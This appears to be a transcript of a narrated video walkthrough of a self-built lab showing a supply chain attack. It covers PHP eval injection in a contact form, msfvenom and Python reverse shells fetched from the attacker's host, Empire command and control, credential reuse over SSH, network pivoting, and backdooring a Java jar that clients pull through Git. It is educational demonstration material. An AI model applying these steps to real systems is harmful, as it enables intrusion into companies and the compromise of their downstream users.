Hello, my name is Mickey, and I will be showing you a walkthrough of the supply chain attack demonstration that I created. So the goal of this exercise is to hack into the clients of the company Hello Java. So I've set up a couple of tabs that are connected with my Win2 server VM, and we're going to be using Metasploit and Empire that are already installed on this VM. So first off, I will be booting up the Empire, and then we can take a look at the website. So it's just a dummy page, there's nothing really on it. And the goal isn't to find any hidden directories or something, or nothing like that. It's just to explore the page, and eventually, hopefully, you will find that if you submit something to the contact form. So let's just create something real quick here. You'll see that your input from the name field is actually concatenated into the error message, which is really fun because this is done using the PHP eval function. So let's say we want to execute ID, we will escape the previous section. So we can do the quote and the end of the command, this will escape it, and then we can use the exec function to get remote code execution, and of course print this out to us again, and then just comment out all the rest of the code. So if you see, when we do this, we will get www data. So the way we can exploit this is we can create a payload using Metasploit's MSF Venom, and then we can upload this and execute it. This way we will have a reverse shell, an interpreter shell, and we will also use Empire as a command and control server to keep all of our hacked VMs in. So first off, let's run MSF Venom to create a payload. MSF Venom -p, and we have the payload right here. So we will be using the Linux 86 interpreter reverse TCP payload. And of course, we first need to know our L host. So I have to get my IP real quick. And now we have also our IP. Okay, so let's do this again. L host, L ports, something random. And we will be creating an elf file, and let's call it payload1. .bin, just like this. Yeah. First have to do some installation, of course. While this is setting up MSF Venom, I will also be creating a listener on Empire. So let's go to the listener step. And again, a random port, let's say this one. Okay, now we can execute this. And let's see, sure. This should be done in a second right here. And we already have our listener. Then we can already go back to main, use stager, let's set this ready as well. It's multi-bash, I think. Yeah. And execute. Okay, cool. So now we have an Empire payload as well as our interpreter payload. So we first have to set MSF console ready, so we can use the multi-handler as a listener. And this binary, we can serve it using Python. And then over here we need to use multi-handler. So let's set the host to RIP, set L port to, what was it that we said? I believe it was 4 times 4. Yeah. So set the L port and of course set the payload to the payload that we used, and then we can run this. So now if we hit our IP on port 8000, we can retrieve the payload, and then if we execute it, we should get a hit on this listener here. So instead of ID, we will be doing wget http and then our IP, and we will be needing port 8000, and the file that we will be retrieving was payload 1.bin. So this will not give you any output, but if you go look to the HTTP server, you'll see that we got a successful hit. The next step is to make this executable, so we can do this like this. Again, this will not give you any output, but it will do what it should do, and then it's just a matter of executing it. And if you go to our interpreter, we have a successful hit. So now we have a shell as www data. Okay, so the next step is to, let's first add it to our Empire. I think it's just this port that we need. So let's go to shell. And this will add the recently compromised server to our Empire agents. So now we have an agent SCA web as www data. Okay, so the next step is to just look around a bit, look at all the files. So we got a shell in the forms directory in var www.html, and apparently there are some files that we have access to, the readme. So it's just from a template. We have our payload that we just uploaded, and of course the contact.php is the PHP file used to send an email. So normally you don't have access to this in a web browser, but now since we have reverse shell, we can take a look at how normally it would work to send an email. So you have the input fields, translate it to an email actually. Apparently they have a comment here, so they know that it doesn't really work yet, but as we saw, there is some error handling, and we have a user account, developer, and security. So even though normally you shouldn't be able to access the contact.php, we did have access to this file by getting a reverse shell, abusing the eval function, and then now we got these passwords. So yeah, that's definitely never write those passwords down, and we can try to look further. Maybe we can do some password reuse, and if you type ipconfig, you'll see that there's the local host address, and there's a second interface with a local IP. So what we're gonna do now is we're gonna pivot into this network and scan for maybe other servers in this network, and then we could try to brute force or password reuse or maybe some other kind of attack. So let's do a run auto route -s and then 172.16.0.0/24. So this will add this route to this connection. So anything towards that IP will be run through this connection. We can now background this and let's search for port scan. Of course you have to spell it correctly, and we will be using the TCP port scan. So let's take a look at the options here. Our host is the whole network. So 172.16.0.0/24, and let's set threads to 100 to make it a bit fast, and then we can run this. So .10 was our own host, the web server, and it has port 22 open and port 80. And then there's this new host, .20, and it also has SSH open. So let's try to get into this machine. We can cancel this here, and let's get back to our shell. So what you can try now is you can SSH as developer into 172.16.0.20, but this shell won't be powerful enough, so it will not succeed. So we need to get another reverse shell that's a bit more stable than this one, and then it will work. So let's get this back, some shell. And in another tab, I'm going to set up a listener and see -nlvp, and let's listen on 1, 2, 3, 4. And what we're gonna do now is we're gonna use the Python reverse shell one-liner, this one right here. First, of course, we're gonna know is Python installed. Let's hope so. Python-v, yep, Python is installed. So we can do this right here. Change the IP value. So let's set it to our IP, and port 1234 is fine. Okay, cool. So we have our listener ready, and when we execute this, boom, we have a listener. We have it in our listener. So now we have another reverse shell. Still not ideal. Python upgrade shell. Let's look for the command real quick. So if you scroll down, you have this simple command. to actually upgrade the shell. So it's a bit better, still not ideal. So you'll probably notice that if you use your arrows or something like that, it's not decent. And the way you can fix this is by backgrounding it using Ctrl Z, then typing stty raw-echo FG for foreground. You will not see it, but it does. It is there. You can execute this, and then hit enter, and then reset the connection. And if it asks for terminal, just type xterm, and now we have a fully functional shell. You can use tab to autocomplete. So if you want to say readme, just tab. This will all work. And now if you try to SSH, you'll see that it will be successful, and we can go explore the app server. So we can try to SSH as developer to 172.16.0.20, and we are sure the password was, got it right here, security, and we now have access. So first things first, let's add this to our empire. So it was this command right here, and hopefully, yep, another hit. Agents, we have a second agent here. So we now have the SEA app server, and we have a connection as developer. So back to this, we can do some looking around. We can see that there's a hello Java directory, cd into this directory, and let's look around. So if you get here, the first thing that you should notice is the README. Of course, there are these Java files, but if you take a look at the README, it says this hello world app, hello world Java app. Okay, cool. And if we do a ls-al, and you'll see that this is a Git directory. So it's from GitHub, has a README, a git ignore, and basically this Java code and a jar file. So if we take a look at hello world.java, just pretty standard hello world app, just like in the README, and it's also been compiled to a jar file. If you take a look at the git ignore, so the class file and .java and the manifest are ignored. So basically how it is done is they wrote the app, they compiled it, and then only the compiled app will be pushed. So the way we can abuse this is by basically adding some malicious code to the app, compiling it, pushing it, and then hopefully the clients that use the app, they will actually pull in the malicious app and they will execute our code. So let's do this by creating a script. Let's say, where was this? Okay, so we have here our Empire payloads. Let's just add them directly to this. Let's stop the server for a second and create empire.sh and just paste it in there. Okay, cool. We can start up the web server again, go to our connection, and let's retrieve the file. So our IP again on port 8000, and it was empire.sh. Okay, so now we have this empire bash script that will connect to our command and control server. So I don't think we can use nano here. Let's try this hello world.java. Okay, so we will be have to deal with v here. So that's v hello world.java. Okay, and let's hit insert mode. Okay, so how this works is we can add a new line, and I've already got it ready here. Is this one you need? So you have to add process runtime.get runtime and the exec. So we can do make it executable. So it was called empire.sh. Okay, and then another new line, and then run the file. And of course, you can't have two variables of the same name. So let's call it just process2. Then we have to hit escape. Then WQ exclamation mark done. And now we will have to compile the app, which is pretty easy. Just do it java c -d point and then hello world.java, and then to create a jar file, just jar-cvmf. They were using a manifest. The target was hello world. No, it was hello java. .jar, and we will be using the class file that we just compiled the Java file into. So hello world.class. And okay, so that should be it. So we have a new jar file. Let's verify it real quick. So the jar file has just been modified, and we can now run the Empire script. So we just need to push this. So let's do git add, git commit, new version updates, something like that. Okay, and then we can do a git push, hopefully. Okay, so now we just have to wait, and then soon we will be seeing 2 new agents in our command and control server. So basically what the goal of this module is that I created, it was for my internship, and it's really the basics of a supply chain attack. So it shows how one security flaw of a company or a chain of security flaws can lead to the clients of this company getting hacked. In this case, it was something small in the contact form. There's no input sanitization or something like that, no input filtering, and it can have severe consequences. In this case, it will lead to a reverse shell, and in the shell we had access to files you normally don't have access to, the contact.php, and yeah, they had a password in here. You can say it would be safe normally, because normally you don't have access to this contact.php file, but yeah, it's still not a good idea, and this one security flaw will lead to actually, the 2 servers being compromised and the clients of the company. So yeah, that's one very basic scenario of a supply chain attack. The way it is configured is that on the clients there is a cron job that will simulate a client updating and then actually executing the newly created jar file. I am going to try and see if you can confirm this will work. Java jar, and then yeah, it should work. And yeah, we get a new agent here. So the cron jobs, they run every 2 minutes, so it will take a few more seconds for the clients to execute it. The first time the interval hits, they just pull in the new code, and then the second time they execute it. This whole module was built using Terraform to build the web server, the attacking server, the app server, and the two clients. And then I used Ansible to configure everything. So this way, if you make use of my platform, you can just hit the start button, everything gets set up for you, and then if you're finished, you can just hit the stop button and the whole environment will be erased. So you always have this fresh environment. It's a great way to get to know some tools, to get a basic understanding of how everything works. Just very easy to set up and very easy to use. It's all also hosted in the cloud, so it's all Azure VMs. Again, this just adds to the flexibility. So here you can see the two clients are coming in. They've executed the malicious script, and if you take a look now, we have the agents, of course, the developer, the app server. I executed it twice, so we have that one twice. And now if we do interact and then let's say client 2, we can do commands and we can see a lot of information. So now we have these agents here in our command and control server, and we can really interact with them and maybe install a backdoor or anything like that. Just do whatever we want. We now have full control of everything, the corporation environment as well as their clients. So yeah, I hope it was very informative for you and that you've now have a better understanding of a basic supply chain attack. So yeah, that was my demonstration of a supply chain attack. Hope you liked it.